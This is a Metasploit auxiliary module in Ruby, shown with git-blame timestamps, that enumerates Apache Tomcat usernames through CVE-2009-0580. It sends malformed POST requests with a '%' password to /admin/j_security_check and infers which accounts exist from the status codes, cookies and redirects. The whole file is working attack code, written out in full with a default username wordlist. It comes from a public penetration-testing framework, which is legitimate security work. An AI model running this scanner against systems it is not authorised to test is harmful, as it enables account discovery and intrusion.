2010-06-09 21:15:49 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2010-06-09 21:15:49 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2010-06-09 21:15:49 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
|
include Msf::Auxiliary::AuthBrute
|
|
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
|
super(
|
|
|
|
|
'Name' => 'Apache Tomcat User Enumeration',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module enumerates Apache Tomcat's usernames via malformed requests to
|
|
|
|
|
j_security_check, which can be found in the web administration package. It should
|
|
|
|
|
work against Tomcat servers 4.1.0 - 4.1.39, 5.5.0 - 5.5.27, and 6.0.0 - 6.0.18.
|
|
|
|
|
Newer versions no longer have the "admin" package by default. The 'admin' package
|
|
|
|
|
is no longer provided for Tomcat 6 and later versions.
|
|
|
|
|
},
|
|
|
|
|
'Author' =>
|
|
|
|
|
[
|
|
|
|
|
'Heyder Andrade <heyder.andrade[at]gmail.com>',
|
|
|
|
|
'Leandro Oliveira <leandrofernando[at]gmail.com>'
|
|
|
|
|
],
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
|
|
|
|
['BID', '35196'],
|
|
|
|
|
['CVE', '2009-0580'],
|
2016-07-15 17:00:31 +00:00
|
|
|
['OSVDB', '55055'],
|
2013-08-30 21:28:54 +00:00
|
|
|
],
|
|
|
|
|
'License' => MSF_LICENSE
|
|
|
|
|
)
|
|
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
Opt::RPORT(8080),
|
2015-11-25 17:23:35 +00:00
|
|
|
OptString.new('TARGETURI', [true, 'The path of the Apache Tomcat Administration page', '/admin/j_security_check']),
|
2013-08-30 21:28:54 +00:00
|
|
|
OptPath.new('USER_FILE', [ true, "File containing users, one per line",
|
2013-09-26 19:34:48 +00:00
|
|
|
File.join(Msf::Config.data_directory, "wordlists", "tomcat_mgr_default_users.txt") ]),
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2013-08-30 21:28:54 +00:00
|
|
|
|
2016-03-07 21:39:15 +00:00
|
|
|
deregister_options('PASS_FILE','USERPASS_FILE','USER_AS_PASS','STOP_ON_SUCCESS','BLANK_PASSWORDS')
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def has_j_security_check?
|
2015-11-25 17:23:35 +00:00
|
|
|
vprint_status("#{full_uri} - Checking j_security_check...")
|
|
|
|
|
res = send_request_raw({'uri' => normalize_uri(target_uri.path)})
|
2013-08-30 21:28:54 +00:00
|
|
|
if res
|
2015-11-25 17:23:35 +00:00
|
|
|
vprint_status("#{full_uri} - Server returned: #{res.code.to_s}")
|
2013-08-30 21:28:54 +00:00
|
|
|
return true if res.code == 200 or res.code == 302
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
false
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def run_host(ip)
|
|
|
|
|
unless has_j_security_check?
|
2015-11-25 17:23:35 +00:00
|
|
|
print_error("#{full_uri} - Unable to enumerate users with this URI")
|
2013-08-30 21:28:54 +00:00
|
|
|
return
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
@users_found = {}
|
|
|
|
|
|
|
|
|
|
each_user_pass { |user,pass|
|
|
|
|
|
do_login(user)
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
if(@users_found.empty?)
|
2015-11-25 17:23:35 +00:00
|
|
|
print_status("#{full_uri} - No users found.")
|
2013-08-30 21:28:54 +00:00
|
|
|
else
|
2015-11-25 17:23:35 +00:00
|
|
|
print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
|
2013-08-30 21:28:54 +00:00
|
|
|
report_note(
|
|
|
|
|
:host => rhost,
|
|
|
|
|
:port => rport,
|
|
|
|
|
:type => 'tomcat.users',
|
|
|
|
|
:data => {:users => @users_found.keys.join(", ")}
|
|
|
|
|
)
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def do_login(user)
|
|
|
|
|
post_data = "j_username=#{user}&password=%"
|
2015-11-25 17:23:35 +00:00
|
|
|
vprint_status("#{full_uri} - Apache Tomcat - Trying name: '#{user}'")
|
2013-08-30 21:28:54 +00:00
|
|
|
begin
|
|
|
|
|
res = send_request_cgi(
|
|
|
|
|
{
|
|
|
|
|
'method' => 'POST',
|
2015-11-25 17:23:35 +00:00
|
|
|
'uri' => normalize_uri(target_uri.path),
|
2013-08-30 21:28:54 +00:00
|
|
|
'data' => post_data,
|
|
|
|
|
}, 20)
|
|
|
|
|
|
2014-05-13 20:56:12 +00:00
|
|
|
if res and res.code == 200 and !res.get_cookies.empty?
|
2015-11-25 17:23:35 +00:00
|
|
|
vprint_error("#{full_uri} - Apache Tomcat #{user} not found ")
|
2013-08-30 21:28:54 +00:00
|
|
|
elsif res and res.code == 200 and res.body =~ /invalid username/i
|
2015-11-25 17:23:35 +00:00
|
|
|
vprint_error("#{full_uri} - Apache Tomcat #{user} not found ")
|
2013-08-30 21:28:54 +00:00
|
|
|
elsif res and res.code == 500
|
|
|
|
|
# Based on: http://archives.neohapsis.com/archives/bugtraq/2009-06/0047.html
|
2015-11-25 17:23:35 +00:00
|
|
|
vprint_good("#{full_uri} - Apache Tomcat #{user} found ")
|
2013-08-30 21:28:54 +00:00
|
|
|
@users_found[user] = :reported
|
|
|
|
|
elsif res and res.body.empty? and res.headers['Location'] !~ /error\.jsp$/
|
|
|
|
|
# Based on: http://archives.neohapsis.com/archives/bugtraq/2009-06/0047.html
|
2015-11-25 17:23:35 +00:00
|
|
|
print_good("#{full_uri} - Apache Tomcat #{user} found ")
|
2013-08-30 21:28:54 +00:00
|
|
|
@users_found[user] = :reported
|
|
|
|
|
else
|
2015-11-25 17:23:35 +00:00
|
|
|
print_error("#{full_uri} - NOT VULNERABLE")
|
2013-08-30 21:28:54 +00:00
|
|
|
return :abort
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
|
2015-11-25 17:23:35 +00:00
|
|
|
print_error("#{full_uri} - UNREACHABLE")
|
2013-08-30 21:28:54 +00:00
|
|
|
return :abort
|
|
|
|
|
end
|
|
|
|
|
end
|
2010-06-09 21:15:49 +00:00
|
|
|
|
|
|
|
|
end
|
2013-08-16 20:45:23 +00:00
|
|
|
|
|
|
|
|
=begin
|
|
|
|
|
|
|
|
|
|
If your Tomcat doesn't have the admin package by default, download it here:
|
|
|
|
|
http://archive.apache.org/dist/tomcat/
|
|
|
|
|
|
|
|
|
|
The package name should look something like: apache-tomcat-[version]-admin.zip
|
|
|
|
|
|
|
|
|
|
=end
|
